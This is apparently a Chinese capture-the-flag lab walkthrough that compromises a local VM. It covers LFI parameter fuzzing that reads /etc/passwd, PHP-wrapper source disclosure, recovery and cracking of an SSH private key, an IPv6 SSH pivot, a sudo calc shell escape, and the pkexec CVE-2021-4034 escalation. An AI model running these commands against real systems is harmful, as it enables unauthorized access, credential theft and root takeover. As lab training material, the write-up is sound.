IP
端口
访问 80 端口只有一句话,目录扫描
访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数
ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0
得到参数 random ,burpsuite 抓包测试
使用 php 伪协议读取 filemanager.php 源码
得到了 ssh 私钥,但是端口扫描得知 22 端口处于 filter 状态
爆破 ssh 私钥
john --wordlists=/usr/share/wordlists/rockyou.txt hash.txt
使用 ipv6 地址链接 ssh
curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6' fe80000000000000020c29fffefeab39 02 40 20 80 ens33 00000000000000000000000000000001 01 80 10 80 lo fd154ba55a2b1008020c29fffefeab39 02 40 00 00 ens33
使用 nmap 扫描
nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39
连接
ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa -6
执行 sudo -l
发现可以以 rohit 用户运行 calc ,执行 !/bin/bash 获得 shell
查看 SUID 文件,发现可以运行 pkexec ,使用 CVE-2021-4034 进行提权
